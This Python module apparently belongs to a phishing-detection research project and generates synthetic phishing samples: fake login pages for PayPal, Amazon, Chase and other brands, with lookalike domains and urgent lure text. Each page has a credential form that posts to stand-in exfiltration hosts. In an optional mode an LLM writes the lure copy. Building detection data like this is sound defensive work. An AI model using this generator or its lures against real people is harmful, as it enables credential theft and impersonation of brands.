"""Generates the LLM-phishing partition used to measure the legacy-vs-LLM
detection gap (see PROJECT_BRIEF.md, Phase 2).

ETHICAL / SCOPE CONSTRAINT: generated samples are a local research artifact
only: they are never hosted, never served to real users, and never leave
`data/generated/` (gitignored).

Two modes, same output shape:
- Mock (default): the persuasive lure copy is templated, deterministic, no
  API calls, no cost — used by tests, CI, and any run without `llm_client`.
- Live (Phase 8, opt-in via `llm_client`): the lure copy — the persuasive,
  per-brand/tone text an attacker would actually tailor, and the part this
  project's "robustness against LLM-generated phishing" claim is about — is
  generated by a real call through `phishshield.data.llm_client`. The page
  skeleton (form, password field, external script/action) stays
  deterministic either way, so mock and live samples exercise the Phase 1
  feature extractors identically and stay comparable across a re-run.
"""

from __future__ import annotations

import itertools
import json
import math
import random
from pathlib import Path
from typing import Optional

from phishshield.data.schema import Sample, Source

# Fixed brand list: (key, display name, real registrable domain).
BRANDS = [
    ("paypal", "PayPal", "paypal.com"),
    ("amazon", "Amazon", "amazon.com"),
    ("apple", "Apple", "apple.com"),
    ("microsoft", "Microsoft", "microsoft.com"),
    ("chase", "Chase Bank", "chase.com"),
    ("netflix", "Netflix", "netflix.com"),
]

TONES = ("urgent", "formal", "reward", "security_alert", "invoice", "delivery")

OBFUSCATIONS = ("typosquat", "hyphenated", "subdomain", "homoglyph")

_TONE_COPY = {
    "urgent": (
        "Your account will be suspended within 24 hours unless you verify "
        "your details immediately."
    ),
    "formal": (
        "As part of our routine security review, please confirm your "
        "account details below."
    ),
    "reward": (
        "You have a pending refund waiting. Confirm your account details "
        "to receive it."
    ),
    "security_alert": (
        "We detected an unusual sign-in attempt on your account. Please "
        "verify this was you."
    ),
    "invoice": (
        "You have an overdue invoice on your account. Log in to review "
        "and settle the balance."
    ),
    "delivery": (
        "Your package delivery could not be completed. Confirm your "
        "address details to reschedule."
    ),
}

_TONE_PATH = {
    "urgent": "account/verify-now",
    "formal": "secure/confirm-identity",
    "reward": "account/claim-refund",
    "security_alert": "secure/confirm-signin",
    "invoice": "account/invoice-review",
    "delivery": "secure/delivery-confirm",
}

# Homoglyph substitutions cheap enough to render in a plain domain string
# (ASCII lookalikes, not true Unicode confusables, to keep URLs copy-pasteable
# in a dataset file without encoding surprises).
_HOMOGLYPHS = {"o": "0", "l": "1", "e": "3", "a": "4"}

_EXFIL_HOSTS = [
    "collect-creds.exfil-drop.ru",
    "data-relay.harvest-node.cn",
    "beacon.credential-sink.top",
]


def _obfuscate_domain(brand_key: str, real_domain: str, technique: str, rng: random.Random) -> str:
    if technique == "typosquat":
        label, tld = real_domain.split(".", 1)
        mid = len(label) // 2
        typo_label = label[:mid] + label[mid] + label[mid:]  # duplicate a middle char
        return f"{typo_label}.{tld}"
    if technique == "hyphenated":
        return f"{brand_key}-account-verification.com"
    if technique == "subdomain":
        return f"{brand_key}.{rng.choice(['id-verify', 'secure-portal', 'account-check'])}.xyz"
    if technique == "homoglyph":
        mangled = "".join(_HOMOGLYPHS.get(c, c) for c in brand_key)
        return f"{mangled}-login.net"
    raise ValueError(f"unknown obfuscation technique: {technique}")


def _render_page(display: str, tone: str, exfil_host: str, title: str, lure_copy: str) -> str:
    """Return body_html for a fake brand login page, given the persuasive
    title/lure_copy (mock-templated or LLM-generated — same skeleton either
    way).

    Structurally mirrors tests/fixtures/phishing_paypal_clone.html so it
    exercises the same HTML feature extractors: a password field, an
    externally-hosted form action, an off-domain script, and a hidden
    element.
    """
    return f"""<!DOCTYPE html>
<html>
<head>
  <title>{title}</title>
  <script src="https://{exfil_host}/track.js"></script>
</head>
<body>
  <div style="display:none">hidden tracking pixel</div>
  <h1>{display} Account Verification</h1>
  <p>{lure_copy}</p>
  <form action="https://{exfil_host}/collect" method="POST">
    <input type="email" name="email" placeholder="Email" />
    <input type="password" name="password" placeholder="Password" />
    <button type="submit">Verify</button>
  </form>
</body>
</html>
"""


def count_unique_lure_calls(max_samples: Optional[int] = None) -> int:
    """Number of distinct (brand, tone) lure-copy API calls a live run would
    make for `max_samples` total samples (or the full grid if None) — used
    by the CLI's `--dry-run` cost estimate without invoking the API.
    """
    total = len(BRANDS) * len(TONES) * len(OBFUSCATIONS)
    if max_samples is not None:
        total = min(total, max_samples)
    obfuscations_per_pair = len(OBFUSCATIONS)
    return min(len(BRANDS) * len(TONES), math.ceil(total / obfuscations_per_pair))


def generate_llm_phishing_dataset(
    seed: int = 42, llm_client: Optional[object] = None, max_samples: Optional[int] = None
) -> list[Sample]:
    """Generate the full brand x tone x obfuscation grid as phishing Samples.

    Deterministic given `seed` when `llm_client` is None (the default,
    mock) — same seed always yields the same dataset, which matters for
    reproducibility of the eval results in Phase 3/4.

    Pass an `AnthropicLureClient` (`phishshield.data.llm_client`) to
    generate real lure copy instead — one API call per (brand, tone) pair
    (12 by default), cached and reused across the 4 obfuscation techniques
    for that pair, since obfuscation only changes the domain, not the page
    copy. `max_samples` stops generation early (in grid order) as a hard
    spend cap for live mode.
    """
    rng = random.Random(seed)
    samples: list[Sample] = []
    lure_cache: dict[tuple[str, str], tuple[str, str]] = {}

    for (brand_key, display, real_domain), tone, technique in itertools.product(
        BRANDS, TONES, OBFUSCATIONS
    ):
        if max_samples is not None and len(samples) >= max_samples:
            break
        domain = _obfuscate_domain(brand_key, real_domain, technique, rng)
        exfil_host = rng.choice(_EXFIL_HOSTS)
        path = _TONE_PATH[tone]
        url = f"https://{domain}/{path}"

        cache_key = (brand_key, tone)
        if cache_key not in lure_cache:
            if llm_client is not None:
                lure = llm_client.generate_lure(display, tone)
                lure_cache[cache_key] = (lure.title, lure.lure_copy)
            else:
                lure_cache[cache_key] = (f"{display} - Verify Your Account", _TONE_COPY[tone])
        title, lure_copy = lure_cache[cache_key]

        html = _render_page(display, tone, exfil_host, title, lure_copy)

        samples.append(
            Sample(
                url=url,
                label=1,
                source=Source.LLM_GENERATED,
                html=html,
                brand_target=brand_key,
            )
        )

    return samples


def save_samples_jsonl(samples: list[Sample], path: str | Path) -> None:
    """Persist samples as one JSON object per line under `data/generated/`.

    This is the on-disk form of the ethical constraint above: the file this
    writes to must stay under the gitignored `data/generated/` directory and
    is read back only by `phishshield.data.loaders.load_llm_generated`.
    """
    out_path = Path(path)
    out_path.parent.mkdir(parents=True, exist_ok=True)
    with out_path.open("w", encoding="utf-8") as f:
        for sample in samples:
            record = {
                "url": sample.url,
                "label": sample.label,
                "source": sample.source.value,
                "html": sample.html,
                "brand_target": sample.brand_target,
            }
            f.write(json.dumps(record) + "\n")
